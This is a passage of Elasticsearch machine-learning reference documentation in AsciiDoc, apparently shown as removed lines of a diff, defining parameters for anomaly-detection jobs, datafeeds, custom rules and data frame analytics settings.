recall -for any class. Defaults to `maximize_minimum_recall`. -end::class-assignment-objective[] - -tag::compute-feature-influence[] -Specifies whether the feature influence calculation is enabled. Defaults to -`true`. -end::compute-feature-influence[] - -tag::custom-preprocessor[] -(Optional, Boolean) -Boolean value indicating if the analytics job created the preprocessor -or if a user provided it. This adjusts the feature importance calculation. -When `true`, the feature importance calculation returns importance for the -processed feature. When `false`, the total importance of the original field -is returned. Default is `false`. -end::custom-preprocessor[] - -tag::custom-rules[] -An array of custom rule objects, which enable you to customize the way detectors -operate. For example, a rule may dictate to the detector conditions under which -results should be skipped. For more examples, see -{ml-docs}/ml-configuring-detector-custom-rules.html[Customizing detectors with custom rules]. -end::custom-rules[] - -tag::custom-rules-actions[] -The set of actions to be triggered when the rule applies. If -more than one action is specified the effects of all actions are combined. The -available actions include: - -* `skip_result`: The result will not be created. This is the default value. -Unless you also specify `skip_model_update`, the model will be updated as usual -with the corresponding series value. -* `skip_model_update`: The value for that series will not be used to update the -model. Unless you also specify `skip_result`, the results will be created as -usual. This action is suitable when certain values are expected to be -consistently anomalous and they affect the model in a way that negatively -impacts the rest of the results. -end::custom-rules-actions[] - -tag::custom-rules-scope[] -An optional scope of series where the rule applies. A rule must either -have a non-empty scope or at least one condition. By default, the scope includes -all series. Scoping is allowed for any of the fields that are also specified in -`by_field_name`, `over_field_name`, or `partition_field_name`. To add a scope -for a field, add the field name as a key in the scope object and set its value -to an object with the following properties: -end::custom-rules-scope[] - -tag::custom-rules-scope-filter-id[] -The id of the filter to be used. -end::custom-rules-scope-filter-id[] - -tag::custom-rules-scope-filter-type[] -Either `include` (the rule applies for values in the filter) or `exclude` (the -rule applies for values not in the filter). Defaults to `include`. -end::custom-rules-scope-filter-type[] - -tag::custom-rules-conditions[] -An optional array of numeric conditions when the rule applies. A rule must -either have a non-empty scope or at least one condition. Multiple conditions are -combined together with a logical `AND`. A condition has the following -properties: -end::custom-rules-conditions[] - -tag::custom-rules-conditions-applies-to[] -Specifies the result property to which the condition applies. The available -options are `actual`, `typical`, `diff_from_typical`, `time`. If your detector -uses `lat_long`, `metric`, `rare`, or `freq_rare` functions, you can only -specify conditions that apply to `time`. -end::custom-rules-conditions-applies-to[] - -tag::custom-rules-conditions-operator[] -Specifies the condition operator. The available options are `gt` (greater than), -`gte` (greater than or equals), `lt` (less than) and `lte` (less than or -equals). -end::custom-rules-conditions-operator[] - -tag::custom-rules-conditions-value[] -The value that is compared against the `applies_to` field using the `operator`. -end::custom-rules-conditions-value[] - -tag::custom-settings[] -Advanced configuration option. Contains custom meta data about the job. For -example, it can contain custom URL information as shown in -{ml-docs}/ml-configuring-url.html[Adding custom URLs to {ml} results]. -end::custom-settings[] - -tag::daily-model-snapshot-retention-after-days[] -Advanced configuration option, which affects the automatic removal of old model -snapshots for this job. It specifies a period of time (in days) after which only -the first snapshot per day is retained. This period is relative to the timestamp -of the most recent snapshot for this job. Valid values range from `0` to -`model_snapshot_retention_days`. For new jobs, the default value is `1`. For -jobs created before version 7.8.0, the default value matches -`model_snapshot_retention_days`. For more information, refer to -{ml-docs}/ml-model-snapshots.html[Model snapshots]. -end::daily-model-snapshot-retention-after-days[] - -tag::data-description[] -The data description defines the format of the input data when you send data to -the job by using the <> API. Note that when configure -a {dfeed}, these properties are automatically set. When data is received via -the <> API, it is not stored in {es}. Only the results -for {anomaly-detect} are retained. -+ -.Properties of `data_description` -[%collapsible%open] -==== -`format`::: - (string) Only `JSON` format is supported at this time. - -`time_field`::: - (string) The name of the field that contains the timestamp. - The default value is `time`. - -`time_format`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=time-format] -==== -end::data-description[] - -tag::datafeed-id[] -A numerical character string that uniquely identifies the -{dfeed}. This identifier can contain lowercase alphanumeric characters (a-z -and 0-9), hyphens, and underscores. It must start and end with alphanumeric -characters. -end::datafeed-id[] - -tag::datafeed-id-wildcard[] -Identifier for the {dfeed}. It can be a {dfeed} identifier or a wildcard -expression. -end::datafeed-id-wildcard[] - -tag::dead-category-count[] -The number of categories created by categorization that will never be assigned -again because another category's definition makes it a superset of the dead -category. (Dead categories are a side effect of the way categorization has no -prior training.) -end::dead-category-count[] - -tag::delayed-data-check-config[] -Specifies whether the {dfeed} checks for missing data and the size of the -window. For example: `{"enabled": true, "check_window": "1h"}`. -+ -The {dfeed} can optionally search over indices that have already been read in -an effort to determine whether any data has subsequently been added to the -index. If missing data is found, it is a good indication that the `query_delay` -option is set too low and the data is being indexed after the {dfeed} has passed -that moment in time. See -{ml-docs}/ml-delayed-data-detection.html[Working with delayed data]. -+ -This check runs only on real-time {dfeeds}. -+ -.Properties of `delayed_data_check_config` -[%collapsible%open] -==== -`check_window`:: -(<>) The window of time that is searched for late data. -This window of time ends with the latest finalized bucket. It defaults to -`null`, which causes an appropriate `check_window` to be calculated when the -real-time {dfeed} runs. In particular, the default `check_window` span -calculation is based on the maximum of `2h` or `8 * bucket_span`. - -`enabled`:: -(Boolean) Specifies whether the {dfeed} periodically checks for delayed data. -Defaults to `true`. -==== -end::delayed-data-check-config[] - -tag::dependent-variable[] -Defines which field of the document is to be predicted. -This parameter is supplied by field name and must match one of the fields in -the index being used to train. If this field is missing from a document, then -that document will not be used for training, but a prediction with the trained -model will be generated for it. It is also known as continuous target variable. -end::dependent-variable[] - -tag::desc-results[] -If true, the results are sorted in descending order. -end::desc-results[] - -tag::description-dfa[] -A description of the job. -end::description-dfa[] - -tag::dest[] -The destination configuration, consisting of `index` and optionally -`results_field` (`ml` by default). -+ -.Properties of `dest` -[%collapsible%open] -==== -`index`::: -(Required, string) Defines the _destination index_ to store the results of the -{dfanalytics-job}. - -`results_field`::: -(Optional, string) Defines the name of the field in which to store the results -of the analysis. Defaults to `ml`. -==== -end::dest[] - -tag::detector-description[] -A description of the detector. For example, `Low event rate`. -end::detector-description[] - -tag::detector-field-name[] -The field that the detector uses in the function. If you use an event rate -function such as `count` or `rare`, do not specify this field. -+ --- -NOTE: The `field_name` cannot contain double quotes or backslashes. - --- -end::detector-field-name[] - -tag::detector-index[] -A unique identifier for the detector. This identifier is based on the order of -the detectors in the `analysis_config`, starting at zero. -end::detector-index[] - -tag::dfas-alpha[] -Regularization factor to penalize deeper trees when training decision trees. -end::dfas-alpha[] - -tag::dfas-downsample-factor[] -The value of the downsample factor. -end::dfas-downsample-factor[] - -tag::dfas-eta-growth[] -Specifies the rate at which the `eta` increases for each new tree that is added to the -forest. For example, a rate of `1.05` increases `eta` by 5%. -end::dfas-eta-growth[] - -tag::dfas-feature-processors[] -A collection of feature preprocessors that modify one or more included fields. -The analysis uses the resulting one or more features instead of the -original document field. Multiple `feature_processors` entries can refer to the -same document fields. -Note, automatic categorical {ml-docs}/ml-feature-encoding.html[feature encoding] -still occurs. -end::dfas-feature-processors[] - -tag::dfas-feature-processors-feat-name[] -The resulting feature name. -end::dfas-feature-processors-feat-name[] - -tag::dfas-feature-processors-field[] -The name of the field to encode. -end::dfas-feature-processors-field[] - -tag::dfas-feature-processors-frequency[] -The configuration information necessary to perform frequency encoding. -end::dfas-feature-processors-frequency[] - -tag::dfas-feature-processors-frequency-map[] -The resulting frequency map for the field value. If the field value is missing -from the `frequency_map`, the resulting value is `0`. -end::dfas-feature-processors-frequency-map[] - -tag::dfas-feature-processors-ngram[] -The configuration information necessary to perform ngram encoding. Features -written out by this encoder have the following name format: -`.`. For example, if the -`feature_prefix` is `f`, the feature name for the second unigram in a string is -`f.11`. -end::dfas-feature-processors-ngram[] - -tag::dfas-feature-processors-ngram-feat-pref[] -The feature name prefix. Defaults to `ngram__`. -end::dfas-feature-processors-ngram-feat-pref[] - -tag::dfas-feature-processors-ngram-field[] -The name of the text field to encode. -end::dfas-feature-processors-ngram-field[] - -tag::dfas-feature-processors-ngram-length[] -Specifies the length of the ngram substring. Defaults to `50`. Must be greater -than `0`. -end::dfas-feature-processors-ngram-length[] - -tag::dfas-feature-processors-ngram-ngrams[] -Specifies which ngrams to gather. It’s an array of integer values where the -minimum value is 1, and a maximum value is 5. -end::dfas-feature-processors-ngram-ngrams[] - -tag::dfas-feature-processors-ngram-start[] -Specifies the zero-indexed start of the ngram substring. Negative values are -allowed for encoding ngram of string suffixes. Defaults to `0`. -end::dfas-feature-processors-ngram-start[] - -tag::dfas-feature-processors-one-hot[] -The configuration information necessary to perform one hot encoding. -end::dfas-feature-processors-one-hot[] - -tag::dfas-feature-processors-one-hot-map[] -The one hot map mapping the field value with the column name. -end::dfas-feature-processors-one-hot-map[] - -tag::dfas-feature-processors-target-mean[] -The configuration information necessary to perform target mean encoding. -end::dfas-feature-processors-target-mean[] - -tag::dfas-feature-processors-target-mean-default[] -The default value if field value is not found in the `target_map`. -end::dfas-feature-processors-target-mean-default[] - -tag::dfas-feature-processors-target-mean-map[] -The field value to target mean transition map. -end::dfas-feature-processors-target-mean-map[] - -tag::dfas-iteration[] -The number of iterations on the analysis. -end::dfas-iteration[] - -tag::dfas-max-attempts[] -If the algorithm fails to determine a non-trivial tree (more than a single -leaf), this parameter determines how many of such consecutive failures are -tolerated. Once the number of attempts exceeds the threshold, the forest -training stops. -end::dfas-max-attempts[] - -tag::dfas-max-optimization-rounds[] -A multiplier responsible for determining the maximum number of -hyperparameter optimization steps in the Bayesian optimization procedure. -The maximum number of steps is determined based on the number of undefined hyperparameters -times the maximum optimization rounds per hyperparameter. -end::dfas-max-optimization-rounds[] - -tag::dfas-num-folds[] -The maximum number of folds for the cross-validation procedure. -end::dfas-num-folds[] - -tag::dfas-num-splits[] -Determines the maximum number of splits for every feature that can occur in a -decision tree when the tree is trained. -end::dfas-num-splits[] - -tag::dfas-soft-limit[] -Tree depth limit is used for calculating the tree depth penalty. This is a soft -limit, it can be exceeded. -end::dfas-soft-limit[] - -tag::dfas-soft-tolerance[] -Tree depth tolerance is used for calculating the tree depth penalty. This is a -soft limit, it can be exceeded. -end::dfas-soft-tolerance[] - -tag::dfas-timestamp[] -The timestamp when the statistics were reported in milliseconds since the epoch. -end::dfas-timestamp[] - -tag::dfas-timing-stats[] -An object containing time statistics about the {dfanalytics-job}. -end::dfas-timing-stats[] - -tag::dfas-timing-stats-elapsed[] -Runtime of the analysis in milliseconds. -end::dfas-timing-stats-elapsed[] - -tag::dfas-timing-stats-iteration[] -Runtime of the latest iteration of the analysis in milliseconds. -end::dfas-timing-stats-iteration[] - -tag::dfas-validation-loss[] -An object containing information about validation loss. -end::dfas-validation-loss[] - -tag::dfas-validation-loss-fold[] -Validation loss values for every added decision tree during the forest growing -procedure. -end::dfas-validation-loss-fold[] - -tag::dfas-validation-loss-type[] -The type of the loss metric. For example, `binomial_logistic`. -end::dfas-validation-loss-type[] - -tag::earliest-record-timestamp[] -The timestamp of the earliest chronologically input document. -end::earliest-record-timestamp[] - -tag::empty-bucket-count[] -The number of buckets which did not contain any data. If your data -contains many empty buckets, consider increasing your `bucket_span` or using -functions that are tolerant to gaps in data such as `mean`, `non_null_sum` or -`non_zero_count`. -end::empty-bucket-count[] - -tag::eta[] -Advanced configuration option. The shrinkage applied to the weights. Smaller -values result in larger forests which have a better generalization error. -However, the smaller the value the longer the training will take. For more -information, about shrinkage, see -{wikipedia}/Gradient_boosting#Shrinkage[this wiki article]. By -default, this value is calcuated during hyperparameter optimization. -end::eta[] - -tag::exclude-frequent[] -Contains one of the following values: `all`, `none`, `by`, or `over`. If set, -frequent entities are excluded from influencing the anomaly results. Entities -can be considered frequent over time or frequent in a population. If you are -working with both over and by fields, then you can set `exclude_frequent` to -`all` for both fields, or to `by` or `over` for those specific fields. -end::exclude-frequent[] - -tag::exclude-interim-results[] -If `true`, the output excludes interim results. By default, interim results are -included. -end::exclude-interim-results[] - -tag::failed-category-count[] -The number of times that categorization wanted to create a new category but -couldn't because the job had hit its `model_memory_limit`. This count does not -track which specific categories failed to be created. Therefore you cannot use -this value to determine the number of unique categories that were missed. -end::failed-category-count[] - -tag::feature-bag-fraction[] -Advanced configuration option. Defines the fraction of features that will be -used when selecting a random bag for each candidate split. By default, this -value is calculated during hyperparameter optimization. -end::feature-bag-fraction[] - -tag::feature-influence-threshold[] -The minimum {olscore} that a document needs to have to calculate its feature -influence score. Value range: 0-1 (`0.1` by default). -end::feature-influence-threshold[] - -tag::filter[] -One or more <>. In addition to the built-in -token filters, other plugins can provide more token filters. This property is -optional. If it is not specified, no token filters are applied prior to -categorization. -end::filter[] - -tag::filter-id[] -A string that uniquely identifies a filter. -end::filter-id[] - -tag::forecast-total[] -The number of individual forecasts currently available for the job. A value of -`1` or more indicates that forecasts exist. -end::forecast-total[] - -tag::frequency[] -The interval at which scheduled queries are made while the {dfeed} runs in real -time. The default value is either the bucket span for short bucket spans, or, -for longer bucket spans, a sensible fraction of the bucket span. For example: -`150s`. When `frequency` is shorter than the bucket span, interim results for -the last (partial) bucket are written then eventually overwritten by the full -bucket results. If the {dfeed} uses aggregations, this value must be divisible -by the interval of the date histogram aggregation. -end::frequency[] - -tag::frequent-category-count[] -The number of categories that match more than 1% of categorized documents. -end::frequent-category-count[] - -tag::from[] -Skips the specified number of {dfanalytics-jobs}. The default value is `0`. -end::from[] - -tag::from-models[] -Skips the specified number of models. The default value is `0`. -end::from-models[] - -tag::function[] -The analysis function that is used. For example, `count`, `rare`, `mean`, `min`, -`max`, and `sum`. For more information, see -{ml-docs}/ml-functions.html[Function reference]. -end::function[] - -tag::gamma[] -Advanced configuration option. Regularization parameter to prevent overfitting -on the training data set. Multiplies a linear penalty associated with the size of -individual trees in the forest. The higher the value the more training will -prefer smaller trees. The smaller this parameter the larger individual trees -will be and the longer training will take. By default, this value is calculated -during hyperparameter optimization. -end::gamma[] - -tag::groups[] -A list of job groups. A job can belong to no groups or many. -end::groups[] - -tag::indices[] -An array of index names. Wildcards are supported. For example: -`["it_ops_metrics", "server*"]`. -+ --- -NOTE: If any indices are in remote clusters then `node.remote_cluster_client` -must not be set to `false` on any {ml} nodes. - --- -end::indices[] - -tag::indices-options[] -Specifies index expansion options that are used during search. -+ --- -For example: -``` -{ - "expand_wildcards": ["all"], - "ignore_unavailable": true, - "allow_no_indices": "false", - "ignore_throttled": true -} -``` -For more information about these options, see <>. --- -end::indices-options[] - -tag::inference-config-classification-num-top-classes[] -Specifies the number of top class predictions to return. Defaults to 0. -end::inference-config-classification-num-top-classes[] - -tag::inference-config-classification-num-top-feature-importance-values[] -Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document. By -default, it is zero and no {feat-imp} calculation occurs. -end::inference-config-classification-num-top-feature-importance-values[] - -tag::inference-config-classification-top-classes-results-field[] -Specifies the field to which the top classes are written. Defaults to -`top_classes`. -end::inference-config-classification-top-classes-results-field[] - -tag::inference-config-classification-prediction-field-type[] -Specifies the type of the predicted field to write. -Acceptable values are: `string`, `number`, `boolean`. When `boolean` is provided -`1.0` is transformed to `true` and `0.0` to `false`. -end::inference-config-classification-prediction-field-type[] - -tag::inference-config-regression-num-top-feature-importance-values[] -Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document. -By default, it is zero and no {feat-imp} calculation occurs. -end::inference-config-regression-num-top-feature-importance-values[] - -tag::inference-config-results-field[] -The field that is added to incoming documents to contain the inference -prediction. Defaults to `predicted_value`. -end::inference-config-results-field[] - -tag::inference-config-results-field-processor[] -The field that is added to incoming documents to contain the inference -prediction. Defaults to the `results_field` value of the {dfanalytics-job} that was -used to train the model, which defaults to `_prediction`. -end::inference-config-results-field-processor[] - -tag::inference-metadata-feature-importance-feature-name[] -The feature for which this importance was calculated. -end::inference-metadata-feature-importance-feature-name[] -tag::inference-metadata-feature-importance-magnitude[] -The average magnitude of this feature across all the training data. -This value is the average of the absolute values of the importance -for this feature. -end::inference-metadata-feature-importance-magnitude[] -tag::inference-metadata-feature-importance-max[] -The maximum importance value across all the training data for this -feature. -end::inference-metadata-feature-importance-max[] -tag::inference-metadata-feature-importance-min[] -The minimum importance value across all the training data for this -feature. -end::inference-metadata-feature-importance-min[] - -tag::influencers[] -A comma separated list of influencer field names. Typically these can be the by, -over, or partition fields that are used in the detector configuration. You might -also want to use a field name that is not specifically named in a detector, but -is available as part of the input data. When you use multiple detectors, the use -of influencers is recommended as it aggregates results for each influencer -entity. -end::influencers[] - -tag::input-bytes[] -The number of bytes of input data posted to the {anomaly-job}. -end::input-bytes[] - -tag::input-field-count[] -The total number of fields in input documents posted to the {anomaly-job}. This -count includes fields that are not used in the analysis. However, be aware that -if you are using a {dfeed}, it extracts only the required fields from the -documents it retrieves before posting them to the job. -end::input-field-count[] - -tag::input-record-count[] -The number of input documents posted to the {anomaly-job}. -end::input-record-count[] - -tag::invalid-date-count[] -The number of input documents with either a missing date field or a date that -could not be parsed. -end::invalid-date-count[] - -tag::is-interim[] -If `true`, this is an interim result. In other words, the results are calculated -based on partial input data. -end::is-interim[] - -tag::job-id-anomaly-detection[] -Identifier for the {anomaly-job}. -end::job-id-anomaly-detection[] - -tag::job-id-anomaly-detection-default[] -Identifier for the {anomaly-job}. It can be a job identifier, a group name, or a -wildcard expression. If you do not specify one of these options, the API returns -information for all {anomaly-jobs}. -end::job-id-anomaly-detection-default[] - -tag::job-id-anomaly-detection-define[] -Identifier for the {anomaly-job}. This identifier can contain lowercase -alphanumeric characters (a-z and 0-9), hyphens, and underscores. It must start -and end with alphanumeric characters. -end::job-id-anomaly-detection-define[] - -tag::job-id-anomaly-detection-list[] -An identifier for the {anomaly-jobs}. It can be a job -identifier, a group name, or a comma-separated list of jobs or groups. -end::job-id-anomaly-detection-list[] - -tag::job-id-anomaly-detection-wildcard[] -Identifier for the {anomaly-job}. It can be a job identifier, a group name, or a -wildcard expression. -end::job-id-anomaly-detection-wildcard[] - -tag::job-id-anomaly-detection-wildcard-list[] -Identifier for the {anomaly-job}. It can be a job identifier, a group name, a -comma-separated list of jobs or groups, or a wildcard expression. -end::job-id-anomaly-detection-wildcard-list[] - -tag::job-id-data-frame-analytics[] -Identifier for the {dfanalytics-job}. -end::job-id-data-frame-analytics[] - -tag::job-id-data-frame-analytics-default[] -Identifier for the {dfanalytics-job}. If you do not specify this option, the API -returns information for the first hundred {dfanalytics-jobs}. -end::job-id-data-frame-analytics-default[] - -tag::job-id-data-frame-analytics-define[] -Identifier for the {dfanalytics-job}. This identifier can contain lowercase -alphanumeric characters (a-z and 0-9), hyphens, and underscores. It must start -and end with alphanumeric characters. -end::job-id-data-frame-analytics-define[] - -tag::job-id-datafeed[] -The unique identifier for the job to which the {dfeed} sends data. -end::job-id-datafeed[] - -tag::jobs-stats-anomaly-detection[] -An array of {anomaly-job} statistics objects. -For more information, see <>. -end::jobs-stats-anomaly-detection[] - -tag::lambda[] -Advanced configuration option. Regularization parameter to prevent overfitting -on the training data set. Multiplies an L2 regularisation term which applies to -leaf weights of the individual trees in the forest. The higher the value the -more training will attempt to keep leaf weights small. This makes the prediction -function smoother at the expense of potentially not being able to capture -relevant relationships between the features and the {depvar}. The smaller this -parameter the larger individual trees will be and the longer training will take. -By default, this value is calculated during hyperparameter optimization. -end::lambda[] - -tag::last-data-time[] -The timestamp at which data was last analyzed, according to server time. -end::last-data-time[] - -tag::latency[] -The size of the window in which to expect data that is out of time order. The -default value is 0 (no latency). If you specify a non-zero value, it must be -greater than or equal to one second. For more information about time units, see -<>. -+ --- -NOTE: Latency is only applicable when you send data by using -the <> API. - --- -end::latency[] - -tag::latest-empty-bucket-timestamp[] -The timestamp of the last bucket that did not contain any data. -end::latest-empty-bucket-timestamp[] - -tag::latest-record-timestamp[] -The timestamp of the latest chronologically input document. -end::latest-record-timestamp[] - -tag::latest-sparse-record-timestamp[] -The timestamp of the last bucket that was considered sparse. -end::latest-sparse-record-timestamp[] - -tag::max-empty-searches[] -If a real-time {dfeed} has never seen any data (including during any initial -training period) then it will automatically stop itself and close its associated -job after this many real-time searches that return no documents. In other words, -it will stop after `frequency` times `max_empty_searches` of real-time -operation. If not set then a {dfeed} with no end time that sees no data will -remain started until it is explicitly stopped. By default this setting is not -set. -end::max-empty-searches[] - -tag::max-trees[] -Advanced configuration option. Defines the maximum number of trees the forest is -allowed to contain. The maximum value is 2000. By default, this value is -calculated during hyperparameter optimization. -end::max-trees[] - -tag::method[] -The method that {oldetection} uses. Available methods are `lof`, `ldof`, -`distance_kth_nn`, `distance_knn`, and `ensemble`. The default value is -`ensemble`, which means that {oldetection} uses an ensemble of different methods -and normalises and combines their individual {olscores} to obtain the overall -{olscore}. -end::method[] - -tag::missing-field-count[] -The number of input documents that are missing a field that the {anomaly-job} is -configured to analyze. Input documents with missing fields are still processed -because it is possible that not all fields are missing. -+ --- -NOTE: If you are using {dfeeds} or posting data to the job in JSON format, a -high `missing_field_count` is often not an indication of data issues. It is not -necessarily a cause for concern. - --- -end::missing-field-count[] - -tag::mode[] -There are three available modes: -+ --- -* `auto`: The chunk size is dynamically calculated. This is the default and -recommended value when the {dfeed} does not use aggregations. -* `manual`: Chunking is applied according to the specified `time_span`. Use this -mode when the {dfeed} uses aggregations. -* `off`: No chunking is applied. --- -end::mode[] - -tag::model-bytes[] -The number of bytes of memory used by the models. This is the maximum value -since the last time the model was persisted. If the job is closed, this value -indicates the latest size. -end::model-bytes[] - -tag::model-bytes-exceeded[] -The number of bytes over the high limit for memory usage at the last allocation -failure. -end::model-bytes-exceeded[] - -tag::model-id[] -The unique identifier of the trained model. -end::model-id[] - -tag::model-memory-limit[] -The approximate maximum amount of memory resources that are required for -analytical processing. Once this limit is approached, data pruning becomes -more aggressive. Upon exceeding this limit, new entities are not modeled. The -default value for jobs created in version 6.1 and later is `1024mb`. -This value will need to be increased for jobs that are expected to analyze high -cardinality fields, but the default is set to a relatively small size to ensure -that high resource usage is a conscious decision. The default value for jobs -created in versions earlier than 6.1 is `4096mb`. -+ -If you specify a number instead of a string, the units are assumed to be MiB. -Specifying a string is recommended for clarity. If you specify a byte size unit -of `b` or `kb` and the number does not equate to a discrete number of megabytes, -it is rounded down to the closest MiB. The minimum valid value is 1 MiB. If you -specify a value less than 1 MiB, an error occurs. For more information about -supported byte size units, see <>. -+ -If your `elasticsearch.yml` file contains an `xpack.ml.max_model_memory_limit` -setting, an error occurs when you try to create jobs that have -`model_memory_limit` values greater than that setting. For more information, -see <>. -end::model-memory-limit[] - -tag::model-memory-limit-anomaly-jobs[] -The upper limit for model memory usage, checked on increasing values. -end::model-memory-limit-anomaly-jobs[] - -tag::model-memory-status[] -The status of the mathematical models, which can have one of the following -values: -+ --- -* `ok`: The models stayed below the configured value. -* `soft_limit`: The models used more than 60% of the configured memory limit -and older unused models will be pruned to free up space. Additionally, in -categorization jobs no further category examples will be stored. -* `hard_limit`: The models used more space than the configured memory limit. -As a result, not all incoming data was processed. --- -end::model-memory-status[] - -tag::model-plot-config[] -This advanced configuration option stores model information along with the -results. It provides a more detailed view into {anomaly-detect}. -+ --- -WARNING: If you enable model plot it can add considerable overhead to the -performance of the system; it is not feasible for jobs with many entities. - -Model plot provides a simplified and indicative view of the model and its -bounds. It does not display complex features such as multivariate correlations -or multimodal data. As such, anomalies may occasionally be reported which cannot -be seen in the model plot. - -Model plot config can be configured when the job is created or updated later. It -must be disabled if performance issues are experienced. --- -end::model-plot-config[] - -tag::model-plot-config-annotations-enabled[] -If true, enables calculation and storage of the model change annotations -for each entity that is being analyzed. Defaults to `enabled`. -end::model-plot-config-annotations-enabled[] - -tag::model-plot-config-enabled[] -If true, enables calculation and storage of the model bounds for each entity -that is being analyzed. By default, this is not enabled. -end::model-plot-config-enabled[] - -tag::model-plot-config-terms[] -Limits data collection to this comma separated list of partition or by field -values. If terms are not specified or it is an empty string, no filtering is -applied. For example, "CPU,NetworkIn,DiskWrites". Wildcards are not supported. -Only the specified `terms` can be viewed when using the Single Metric Viewer. -end::model-plot-config-terms[] - -tag::model-snapshot-retention-days[] -Advanced configuration option, which affects the automatic removal of old model -snapshots for this job. It specifies the maximum period of time (in days) that -snapshots are retained. This period is relative to the timestamp of the most -recent snapshot for this job. The default value is `10`, which means snapshots -ten days older than the newest snapshot are deleted. For more information, refer -to {ml-docs}/ml-model-snapshots.html[Model snapshots]. -end::model-snapshot-retention-days[] - -tag::model-timestamp[] -The timestamp of the last record when the model stats were gathered. -end::model-timestamp[] - -tag::multivariate-by-fields[] -This functionality is reserved for internal use. It is not supported for use in -customer environments and is not subject to the support SLA of official GA -features. -+ --- -If set to `true`, the analysis will automatically find correlations between -metrics for a given `by` field value and report anomalies when those -correlations cease to hold. For example, suppose CPU and memory usage on host A -is usually highly correlated with the same metrics on host B. Perhaps this -correlation occurs because they are running a load-balanced application. -If you enable this property, then anomalies will be reported when, for example, -CPU usage on host A is high and the value of CPU usage on host B is low. That -is to say, you'll see an anomaly when the CPU of host A is unusual given -the CPU of host B. - -NOTE: To use the `multivariate_by_fields` property, you must also specify -`by_field_name` in your detector. - --- -end::multivariate-by-fields[] - -tag::n-neighbors[] -Defines the value for how many nearest neighbors each method of {oldetection} -uses to calculate its {olscore}. When the value is not set, different values are -used for different ensemble members. This deafault behavior helps improve the -diversity in the ensemble; only override it if you are confident that the value -you choose is appropriate for the data set. -end::n-neighbors[] - -tag::node-address[] -The network address of the node. -end::node-address[] - -tag::node-attributes[] -Lists node attributes such as `ml.machine_memory` or `ml.max_open_jobs` settings. -end::node-attributes[] - -tag::node-datafeeds[] -For started {dfeeds} only, this information pertains to the node upon which the -{dfeed} is started. -end::node-datafeeds[] - -tag::node-ephemeral-id[] -The ephemeral ID of the node. -end::node-ephemeral-id[] - -tag::node-id[] -The unique identifier of the node. -end::node-id[] - -tag::node-jobs[] -Contains properties for the node that runs the job. This information is -available only for open jobs. -end::node-jobs[] - -tag::node-transport-address[] -The host and port where transport HTTP connections are accepted. -end::node-transport-address[] - -tag::open-time[] -For open jobs only, the elapsed time for which the job has been open. -end::open-time[] - -tag::outlier-fraction[] -The proportion of the data set that is assumed to be outlying prior to -{oldetection}. For example, 0.05 means it is assumed that 5% of values are real -outliers and 95% are inliers. -end::outlier-fraction[] - -tag::out-of-order-timestamp-count[] -The number of input documents that are out of time sequence and outside -of the latency window. This information is applicable only when you provide data -to the {anomaly-job} by using the <>. These out of -order documents are discarded, since jobs require time series data to be in -ascending chronological order. -end::out-of-order-timestamp-count[] - -tag::over-field-name[] -The field used to split the data. In particular, this property is used for -analyzing the splits with respect to the history of all splits. It is used for -finding unusual values in the population of all splits. For more information, -see {ml-docs}/ml-configuring-populations.html[Performing population analysis]. -end::over-field-name[] - -tag::partition-field-name[] -The field used to segment the analysis. When you use this property, you have -completely independent baselines for each value of this field. -end::partition-field-name[] - -tag::peak-model-bytes[] -The peak number of bytes of memory ever used by the models. -end::peak-model-bytes[] - -tag::per-partition-categorization[] -Settings related to how categorization interacts with partition fields. -end::per-partition-categorization[] - -tag::per-partition-categorization-enabled[] -To enable this setting, you must also set the partition_field_name property to -the same value in every detector that uses the keyword mlcategory. Otherwise, -job creation fails. -end::per-partition-categorization-enabled[] - -tag::per-partition-categorization-stop-on-warn[] -This setting can be set to true only if per-partition categorization is enabled. -If true, both categorization and subsequent anomaly detection stops for -partitions where the categorization status changes to `warn`. This setting makes -it viable to have a job where it is expected that categorization works well for -some partitions but not others; you do not pay the cost of bad categorization -forever in the partitions where it works badly. -end::per-partition-categorization-stop-on-warn[] - -tag::prediction-field-name[] -Defines the name of the prediction field in the results. -Defaults to `_prediction`. -end::prediction-field-name[] - -tag::processed-field-count[] -The total number of fields in all the documents that have been processed by the -{anomaly-job}. Only fields that are specified in the detector configuration -object contribute to this count. The timestamp is not included in this count. -end::processed-field-count[] - -tag::processed-record-count[] -The number of input documents that have been processed by the {anomaly-job}. -This value includes documents with missing fields, since they are nonetheless -analyzed. If you use {dfeeds} and have aggregations in your search query, the -`processed_record_count` is the number of aggregation results processed, not the -number of {es} documents. -end::processed-record-count[] - -tag::query[] -The {es} query domain-specific language (DSL). This value corresponds to the -query object in an {es} search POST body. All the options that are supported by -{es} can be used, as this object is passed verbatim to {es}. By default, this -property has the following value: `{"match_all": {"boost": 1}}`. -end::query[] - -tag::query-delay[] -The number of seconds behind real time that data is queried. For example, if -data from 10:04 a.m. might not be searchable in {es} until 10:06 a.m., set this -property to 120 seconds. The default value is randomly selected between `60s` -and `120s`. This randomness improves the query performance when there are -multiple jobs running on the same node. For more information, see -{ml-docs}/ml-delayed-data-detection.html[Handling delayed data]. -end::query-delay[] - -tag::randomize-seed[] -Defines the seed to the random generator that is used to pick -which documents will be used for training. By default it is randomly generated. -Set it to a specific value to ensure the same documents are used for training -assuming other related parameters (e.g. `source`, `analyzed_fields`, etc.) are -the same. -end::randomize-seed[] - -tag::rare-category-count[] -The number of categories that match just one categorized document. -end::rare-category-count[] - -tag::renormalization-window-days[] -Advanced configuration option. The period over which adjustments to the score -are applied, as new data is seen. The default value is the longer of 30 days or -100 `bucket_spans`. -end::renormalization-window-days[] - -tag::results-index-name[] -A text string that affects the name of the {ml} results index. The default value -is `shared`, which generates an index named `.ml-anomalies-shared`. -end::results-index-name[] - -tag::results-retention-days[] -Advanced configuration option. The period of time (in days) that results are -retained. Age is calculated relative to the timestamp of the latest bucket -result. If this property has a non-null value, once per day at 00:30 (server -time), results that are the specified number of days older than the latest -bucket result are deleted from {es}. The default value is null, which means all -results are retained. -end::results-retention-days[] - -tag::retain[] -If `true`, this snapshot will not be deleted during automatic cleanup of -snapshots older than `model_snapshot_retention_days`. However, this snapshot -will be deleted when the job is deleted. The default value is `false`. -end::retain[] - -tag::script-fields[] -Specifies scripts that evaluate custom expressions and returns script fields to -the {dfeed}. The detector configuration objects in a job can contain functions -that use these script fields. For more information, see -{ml-docs}/ml-configuring-transform.html[Transforming data with script fields] -and <>. -end::script-fields[] - -tag::scroll-size[] -The `size` parameter that is used in 